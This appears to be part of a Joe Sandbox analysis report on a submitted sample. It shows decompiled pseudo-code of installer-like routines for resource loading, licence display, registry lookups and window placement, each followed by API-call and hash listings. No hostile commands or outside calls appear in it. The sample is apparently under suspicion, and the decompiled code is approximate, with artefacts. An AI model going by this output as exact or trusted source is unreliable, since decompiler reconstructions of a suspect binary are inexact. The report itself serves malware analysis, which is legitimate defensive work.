                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00E82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00E82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x00e829b2
                                                                                                                                                                                                        0x00e829b2
                                                                                                                                                                                                        0x00e829b5
                                                                                                                                                                                                        0x00e829bd
                                                                                                                                                                                                        0x00e829c3
                                                                                                                                                                                                        0x00e829cc
                                                                                                                                                                                                        0x00e829d5
                                                                                                                                                                                                        0x00e829d7
                                                                                                                                                                                                        0x00e829da
                                                                                                                                                                                                        0x00e829dd
                                                                                                                                                                                                        0x00e829df
                                                                                                                                                                                                        0x00e829ec
                                                                                                                                                                                                        0x00e829f8
                                                                                                                                                                                                        0x00e829fc
                                                                                                                                                                                                        0x00e829ff
                                                                                                                                                                                                        0x00e82a02
                                                                                                                                                                                                        0x00e82a07
                                                                                                                                                                                                        0x00e82a0a
                                                                                                                                                                                                        0x00e82a0f
                                                                                                                                                                                                        0x00e82a19
                                                                                                                                                                                                        0x00e82a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82a0f
                                                                                                                                                                                                        0x00e8298c
                                                                                                                                                                                                        0x00e82974
                                                                                                                                                                                                        0x00e82962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8294f
                                                                                                                                                                                                        0x00e82912
                                                                                                                                                                                                        0x00e82a65
                                                                                                                                                                                                        0x00e82a68
                                                                                                                                                                                                        0x00e82a6c
                                                                                                                                                                                                        0x00e82a6f
                                                                                                                                                                                                        0x00e82a6f
                                                                                                                                                                                                        0x00e82a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00E82A6F
                                                                                                                                                                                                          • Part of subcall function 00E82773: CharUpperA.USER32(18391FE1,00000000,00000000,00000000), ref: 00E827A8
                                                                                                                                                                                                          • Part of subcall function 00E82773: CharNextA.USER32(0000054D), ref: 00E827B5
                                                                                                                                                                                                          • Part of subcall function 00E82773: CharNextA.USER32(00000000), ref: 00E827BC
                                                                                                                                                                                                          • Part of subcall function 00E82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82829
                                                                                                                                                                                                          • Part of subcall function 00E82773: RegQueryValueExA.ADVAPI32(?,00E81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82852
                                                                                                                                                                                                          • Part of subcall function 00E82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82870
                                                                                                                                                                                                          • Part of subcall function 00E82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E828A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00E83938,?,?,?,?,-00000005), ref: 00E82958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00E82969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E83938,?,?,?,?,-00000005,?), ref: 00E82A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00E83938,?,?), ref: 00E82A81
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID: 89
                                                                                                                                                                                                        • API String ID: 3949799724-2925746602
                                                                                                                                                                                                        • Opcode ID: f371d4dfc8e0e6cb5a7224c1248a80efc334163e6d176b6c380aeb426909f49d
                                                                                                                                                                                                        • Instruction ID: 458b63b3f15ba414027a4693826a1c9635a429a997f2d3df9d7b738de62dca7f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f371d4dfc8e0e6cb5a7224c1248a80efc334163e6d176b6c380aeb426909f49d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD510831900219DFDB25EF99D884AAEBBB5FF48704F14506AEA1DF3211D7319941DB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00E843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E843F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00E84423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00E8442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00E8443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00E84447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00E844A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: b057e1f43aaed479ed4255b4584ddca714980400fd36f12606016d1a6bac7740
                                                                                                                                                                                                        • Instruction ID: cfc791948e183201817698e5db4caac4ae3828e0d751d50ed450bb99d27dc2d0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b057e1f43aaed479ed4255b4584ddca714980400fd36f12606016d1a6bac7740
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4316072E00119AFDB14DFB9DD889EEBBB5EB89310F194169F819F3290DA306D058B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00E86298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E00E8171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0xe8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E00E8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E00E86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8171E: _vsnprintf.MSVCRT ref: 00E81750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00E851CA,00000004,00000024,00E82F71,?,00000002,00000000), ref: 00E862CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E851CA,00000004,00000024,00E82F71,?,00000002,00000000), ref: 00E862D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E851CA,00000004,00000024,00E82F71,?,00000002,00000000), ref: 00E8631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00E86345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E851CA,00000004,00000024,00E82F71,?,00000002,00000000), ref: 00E86357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: 715bd661e444e8b559209cbcd2408383429ddd8faa782a9c1d397ec1098005e0
                                                                                                                                                                                                        • Instruction ID: 1d0b36a406ca9eae0e169e246c87189512394738243bc44b9c05c6984bd09bf8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 715bd661e444e8b559209cbcd2408383429ddd8faa782a9c1d397ec1098005e0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A121F671A00219AFDB10AFA5DC499FFBB7DEB84714B04116AF90EB3251DB359D068BE0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E83A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E00E8468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0xe88d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E00E8468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0xe88d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0xe88d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xe89124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E00E86517(_t19, 0x7d1, 0, E00E83100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0xe88d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xe89124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0xe88d4c);
                                                                                                                                                                                                        					 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xe89124 = E00E86285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E82F64,?,00000002,00000000), ref: 00E83A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00E83AB3
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00E83AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00E83B13
                                                                                                                                                                                                          • Part of subcall function 00E86517: FindResourceA.KERNEL32(00E80000,000007D6,00000005), ref: 00E8652A
                                                                                                                                                                                                          • Part of subcall function 00E86517: LoadResource.KERNEL32(00E80000,00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E86538
                                                                                                                                                                                                          • Part of subcall function 00E86517: DialogBoxIndirectParamA.USER32(00E80000,00000000,00000547,00E819E0,00000000), ref: 00E86557
                                                                                                                                                                                                          • Part of subcall function 00E86517: FreeResource.KERNEL32(00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E86560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00E83100,00000000,00000000), ref: 00E83AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: 76f03d41539df78b67c2f678a0feafefedf95153ee68de33919fe2afb06c2a3d
                                                                                                                                                                                                        • Instruction ID: 68ecbb49dc94d2937571aaa3228c6ffe4dbda48efb10c505e8d0b85555845173
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76f03d41539df78b67c2f678a0feafefedf95153ee68de33919fe2afb06c2a3d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1711B170601201AFD724BF73AD09E273AFDDBD5B00B14643EB94DFA1E1DA7988059721
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E824E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E00E8658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00E82506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00E8252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 00E8253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00E8254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00E82555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: 66c199207d3590949c0c1dc2e58fb5b0b4e5ffd2fac86d40ff9fe5abd80f71d2
                                                                                                                                                                                                        • Instruction ID: 027f373bdb5514d14d028bfef5fc23496e3d4adaf60896796b5980f23fb7bfcd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66c199207d3590949c0c1dc2e58fb5b0b4e5ffd2fac86d40ff9fe5abd80f71d2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F0152326002186BD720AB669D09EDBBBBDDB45760F040165FA4DF7190DA748E4A8B92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00E836EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
